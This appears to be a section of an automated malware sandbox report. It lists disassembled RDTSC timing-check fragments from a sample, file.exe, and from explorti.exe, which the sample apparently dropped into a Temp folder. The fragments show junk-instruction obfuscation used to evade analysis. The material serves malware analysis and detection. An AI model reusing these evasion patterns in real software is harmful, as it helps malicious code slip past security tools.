Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53A0B31 second address: 53A0B62 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 call 00007F0064E5702Bh 0x0000000a mov esi, 3EEAF43Fh 0x0000000f pop eax 0x00000010 popad 0x00000011 push ebp 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F0064E57037h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53A0B62 second address: 53A0BAA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F00646A4389h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], ebx 0x0000000c jmp 00007F00646A437Eh 0x00000011 xchg eax, ebx 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F00646A4387h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53A0BAA second address: 53A0BCB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ecx 0x00000005 mov si, di 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F0064E57033h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53A0BCB second address: 53A0C0C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F00646A437Fh 0x00000008 call 00007F00646A4388h 0x0000000d pop esi 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 xchg eax, ebx 0x00000012 pushad 0x00000013 movsx edx, ax 0x00000016 mov ah, 94h 0x00000018 popad 0x00000019 push dword ptr [ebp+14h] 0x0000001c push eax 0x0000001d push edx 0x0000001e pushad 0x0000001f mov cl, 04h 0x00000021 mov cl, bh 0x00000023 popad 0x00000024 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53A0C0C second address: 53A0C21 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bx, D7E4h 0x00000007 mov ch, dl 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push dword ptr [ebp+10h] 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53A0C21 second address: 53A0C25 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53A0C25 second address: 53A0C29 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53A0C29 second address: 53A0C2F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53A0CAA second address: 53A0CAE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53A0CAE second address: 53A0CB2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53A0CB2 second address: 53A0CB8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53B0C8F second address: 53B0C95 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53B0C95 second address: 53B0CF0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007F0064E57036h 0x0000000e xchg eax, ebp 0x0000000f pushad 0x00000010 pushad 0x00000011 call 00007F0064E5702Ch 0x00000016 pop eax 0x00000017 pushad 0x00000018 popad 0x00000019 popad 0x0000001a jmp 00007F0064E57031h 0x0000001f popad 0x00000020 mov ebp, esp 0x00000022 jmp 00007F0064E5702Eh 0x00000027 pop ebp 0x00000028 pushad 0x00000029 mov cl, 69h 0x0000002b push edx 0x0000002c push eax 0x0000002d push edx 0x0000002e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53B0A2A second address: 53B0A2E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53B0A2E second address: 53B0A34 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 54204E9 second address: 54204EF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 54204EF second address: 54204F3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 54204F3 second address: 5420520 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push esi 0x00000009 jmp 00007F00646A437Ch 0x0000000e mov dword ptr [esp], ebp 0x00000011 jmp 00007F00646A4380h 0x00000016 mov ebp, esp 0x00000018 pushad 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5420338 second address: 5420347 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0064E5702Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5420347 second address: 5420386 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F00646A437Fh 0x00000009 sbb ah, FFFFFF8Eh 0x0000000c jmp 00007F00646A4389h 0x00000011 popfd 0x00000012 movzx esi, bx 0x00000015 popad 0x00000016 pop edx 0x00000017 pop eax 0x00000018 push eax 0x00000019 push eax 0x0000001a push edx 0x0000001b pushad 0x0000001c push edi 0x0000001d pop ecx 0x0000001e pushad 0x0000001f popad 0x00000020 popad 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5420386 second address: 54203BD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ecx, 0BE2F5D9h 0x00000008 mov edx, eax 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov dword ptr [esp], ebp 0x00000010 jmp 00007F0064E57030h 0x00000015 mov ebp, esp 0x00000017 push eax 0x00000018 push edx 0x00000019 pushad 0x0000001a jmp 00007F0064E5702Dh 0x0000001f mov ax, BC57h 0x00000023 popad 0x00000024 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53C0068 second address: 53C0084 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F00646A4388h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53C0084 second address: 53C0088 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53C0088 second address: 53C009D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F00646A437Ah 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5420710 second address: 542072D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0064E57039h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 542072D second address: 542078B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F00646A4387h 0x00000009 or si, 61FEh 0x0000000e jmp 00007F00646A4389h 0x00000013 popfd 0x00000014 mov di, si 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a push dword ptr [ebp+08h] 0x0000001d push eax 0x0000001e push edx 0x0000001f jmp 00007F00646A4389h 0x00000024 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53D055F second address: 53D0563 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53D0563 second address: 53D0569 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53D0569 second address: 53D060F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F0064E5702Ch 0x00000009 sbb si, CFA8h 0x0000000e jmp 00007F0064E5702Bh 0x00000013 popfd 0x00000014 pushfd 0x00000015 jmp 00007F0064E57038h 0x0000001a sbb cl, 00000008h 0x0000001d jmp 00007F0064E5702Bh 0x00000022 popfd 0x00000023 popad 0x00000024 pop edx 0x00000025 pop eax 0x00000026 push FFFFFFFEh 0x00000028 pushad 0x00000029 mov bx, E276h 0x0000002d popad 0x0000002e call 00007F0064E57029h 0x00000033 pushad 0x00000034 pushfd 0x00000035 jmp 00007F0064E57033h 0x0000003a jmp 00007F0064E57033h 0x0000003f popfd 0x00000040 popad 0x00000041 push eax 0x00000042 jmp 00007F0064E57034h 0x00000047 mov eax, dword ptr [esp+04h] 0x0000004b pushad 0x0000004c push eax 0x0000004d push edx 0x0000004e movsx ebx, si 0x00000051 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53D060F second address: 53D069A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 call 00007F00646A437Fh 0x00000009 call 00007F00646A4388h 0x0000000e pop esi 0x0000000f pop edi 0x00000010 popad 0x00000011 mov eax, dword ptr [eax] 0x00000013 pushad 0x00000014 pushfd 0x00000015 jmp 00007F00646A4387h 0x0000001a xor esi, 3A65DFCEh 0x00000020 jmp 00007F00646A4389h 0x00000025 popfd 0x00000026 mov ch, 0Dh 0x00000028 popad 0x00000029 mov dword ptr [esp+04h], eax 0x0000002d push eax 0x0000002e push edx 0x0000002f jmp 00007F00646A4389h 0x00000034 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53D069A second address: 53D06A0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53D06A0 second address: 53D06DE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F00646A4383h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop eax 0x0000000c jmp 00007F00646A4386h 0x00000011 push 62EF64ABh 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 pushad 0x0000001a popad 0x0000001b movzx esi, di 0x0000001e popad 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53D06DE second address: 53D06F2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop ebx 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xor dword ptr [esp], 1400CAABh 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53D06F2 second address: 53D06FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov ax, B467h 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53D06FB second address: 53D075E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F0064E57036h 0x00000009 and eax, 0BAE89C8h 0x0000000f jmp 00007F0064E5702Bh 0x00000014 popfd 0x00000015 popad 0x00000016 pop edx 0x00000017 pop eax 0x00000018 mov eax, dword ptr fs:[00000000h] 0x0000001e jmp 00007F0064E57036h 0x00000023 nop 0x00000024 jmp 00007F0064E57030h 0x00000029 push eax 0x0000002a pushad 0x0000002b pushad 0x0000002c mov bl, 31h 0x0000002e push eax 0x0000002f push edx 0x00000030 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53D075E second address: 53D07C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 mov cl, 5Eh 0x00000007 popad 0x00000008 nop 0x00000009 pushad 0x0000000a mov di, 26D2h 0x0000000e pushad 0x0000000f mov bx, 3CCCh 0x00000013 call 00007F00646A4385h 0x00000018 pop eax 0x00000019 popad 0x0000001a popad 0x0000001b sub esp, 1Ch 0x0000001e pushad 0x0000001f mov dl, A5h 0x00000021 mov cx, E7F5h 0x00000025 popad 0x00000026 xchg eax, ebx 0x00000027 jmp 00007F00646A4380h 0x0000002c push eax 0x0000002d jmp 00007F00646A437Bh 0x00000032 xchg eax, ebx 0x00000033 push eax 0x00000034 push edx 0x00000035 push eax 0x00000036 push edx 0x00000037 jmp 00007F00646A4380h 0x0000003c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53D07C6 second address: 53D07CC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53D07CC second address: 53D07D2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53D07D2 second address: 53D07D6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53D07D6 second address: 53D081D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, esi 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e pushfd 0x0000000f jmp 00007F00646A4387h 0x00000014 and eax, 1169939Eh 0x0000001a jmp 00007F00646A4389h 0x0000001f popfd 0x00000020 popad 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53D081D second address: 53D0861 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007F0064E57037h 0x00000008 pop ecx 0x00000009 jmp 00007F0064E57039h 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push eax 0x00000012 pushad 0x00000013 mov si, bx 0x00000016 popad 0x00000017 xchg eax, esi 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b push edx 0x0000001c pushad 0x0000001d popad 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53D0861 second address: 53D0867 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53D0867 second address: 53D0878 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push ebx 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e mov bx, cx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53D0878 second address: 53D0959 instructions: 0x00000000 rdtsc 0x00000002 mov cx, 45A5h 0x00000006 pop edx 0x00000007 pop eax 0x00000008 call 00007F00646A4382h 0x0000000d pushfd 0x0000000e jmp 00007F00646A4382h 0x00000013 or al, FFFFFFE8h 0x00000016 jmp 00007F00646A437Bh 0x0000001b popfd 0x0000001c pop esi 0x0000001d popad 0x0000001e mov dword ptr [esp], edi 0x00000021 jmp 00007F00646A437Fh 0x00000026 mov eax, dword ptr [76FAB370h] 0x0000002b jmp 00007F00646A4386h 0x00000030 xor dword ptr [ebp-08h], eax 0x00000033 jmp 00007F00646A4380h 0x00000038 xor eax, ebp 0x0000003a jmp 00007F00646A4381h 0x0000003f nop 0x00000040 jmp 00007F00646A437Eh 0x00000045 push eax 0x00000046 pushad 0x00000047 jmp 00007F00646A4381h 0x0000004c popad 0x0000004d nop 0x0000004e jmp 00007F00646A437Ah 0x00000053 lea eax, dword ptr [ebp-10h] 0x00000056 pushad 0x00000057 push ecx 0x00000058 mov bx, F180h 0x0000005c pop edx 0x0000005d movzx esi, bx 0x00000060 popad 0x00000061 mov dword ptr fs:[00000000h], eax 0x00000067 push eax 0x00000068 push edx 0x00000069 jmp 00007F00646A437Ch 0x0000006e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53D0959 second address: 53D0971 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0064E5702Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov esi, dword ptr [ebp+08h] 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53D0971 second address: 53D0975 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53D0975 second address: 53D097B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53D097B second address: 53D09BF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F00646A437Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esi+10h] 0x0000000c jmp 00007F00646A4380h 0x00000011 test eax, eax 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 jmp 00007F00646A437Dh 0x0000001b jmp 00007F00646A4380h 0x00000020 popad 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53D09BF second address: 53D0A31 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov eax, ebx 0x00000005 mov di, 8DD0h 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jne 00007F00D693637Fh 0x00000012 jmp 00007F0064E5702Fh 0x00000017 sub eax, eax 0x00000019 jmp 00007F0064E5702Fh 0x0000001e mov dword ptr [ebp-20h], eax 0x00000021 jmp 00007F0064E57036h 0x00000026 mov ebx, dword ptr [esi] 0x00000028 jmp 00007F0064E57030h 0x0000002d mov dword ptr [ebp-24h], ebx 0x00000030 push eax 0x00000031 push edx 0x00000032 pushad 0x00000033 jmp 00007F0064E5702Dh 0x00000038 push eax 0x00000039 push edx 0x0000003a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53D0A31 second address: 53D0A36 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53D0A36 second address: 53D0A63 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0064E57037h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 test ebx, ebx 0x0000000b pushad 0x0000000c mov al, dh 0x0000000e popad 0x0000000f je 00007F00D693624Ch 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53D0A63 second address: 53D0A67 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53D0A67 second address: 53D0A76 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0064E5702Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53D0A76 second address: 53D0A8C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edx, 6CE91D0Ah 0x00000008 pushad 0x00000009 popad 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d cmp ebx, FFFFFFFFh 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53D0A8C second address: 53D0A90 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53D0A90 second address: 53D0A96 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53D014C second address: 53D0152 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53D0152 second address: 53D0156 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53D0156 second address: 53D015A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	RDTSC instruction interceptor: First address: 31315E second address: 31317B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F00646A437Ah 0x00000007 jmp 00007F00646A437Bh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push ebx 0x00000011 pop ebx 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	RDTSC instruction interceptor: First address: 2F7308 second address: 2F730C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	RDTSC instruction interceptor: First address: 3123A4 second address: 3123D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F00646A437Eh 0x0000000a pop ebx 0x0000000b pushad 0x0000000c jmp 00007F00646A4385h 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	RDTSC instruction interceptor: First address: 312559 second address: 31255D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	RDTSC instruction interceptor: First address: 314311 second address: 314316 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	RDTSC instruction interceptor: First address: 314316 second address: 31433B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0064E57037h 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov eax, dword ptr [eax] 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	RDTSC instruction interceptor: First address: 31433B second address: 314342 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	RDTSC instruction interceptor: First address: 314342 second address: 314353 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pushad 0x00000004 popad 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp+04h], eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f push esi 0x00000010 pop esi 0x00000011 rdtsc
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	RDTSC instruction interceptor: First address: 314353 second address: 314367 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F00646A437Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push edi 0x0000000c pop edi 0x0000000d rdtsc
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	RDTSC instruction interceptor: First address: 314443 second address: 3144EC instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F0064E57030h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov eax, dword ptr [esp+04h] 0x0000000e jmp 00007F0064E5702Dh 0x00000013 mov eax, dword ptr [eax] 0x00000015 jbe 00007F0064E5703Dh 0x0000001b mov dword ptr [esp+04h], eax 0x0000001f pushad 0x00000020 jmp 00007F0064E5702Fh 0x00000025 jmp 00007F0064E5702Bh 0x0000002a popad 0x0000002b pop eax 0x0000002c mov ecx, dword ptr [ebp+122D2AC6h] 0x00000032 push 00000003h 0x00000034 mov esi, ecx 0x00000036 push 00000000h 0x00000038 jmp 00007F0064E57030h 0x0000003d push 00000003h 0x0000003f mov ecx, dword ptr [ebp+122D1D65h] 0x00000045 push 95F19BD3h 0x0000004a push eax 0x0000004b push edx 0x0000004c jmp 00007F0064E57039h 0x00000051 rdtsc
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	RDTSC instruction interceptor: First address: 3144EC second address: 314522 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F00646A437Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a xor dword ptr [esp], 55F19BD3h 0x00000011 push esi 0x00000012 or dword ptr [ebp+122D1AB2h], ecx 0x00000018 pop edi 0x00000019 lea ebx, dword ptr [ebp+1244921Fh] 0x0000001f mov ecx, dword ptr [ebp+122D2986h] 0x00000025 xchg eax, ebx 0x00000026 push eax 0x00000027 push edx 0x00000028 push eax 0x00000029 push edx 0x0000002a jnc 00007F00646A4376h 0x00000030 rdtsc
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	RDTSC instruction interceptor: First address: 314522 second address: 314526 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	RDTSC instruction interceptor: First address: 314526 second address: 31452C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	RDTSC instruction interceptor: First address: 31452C second address: 314532 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	RDTSC instruction interceptor: First address: 314532 second address: 314541 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push eax 0x0000000d pop eax 0x0000000e pop eax 0x0000000f rdtsc
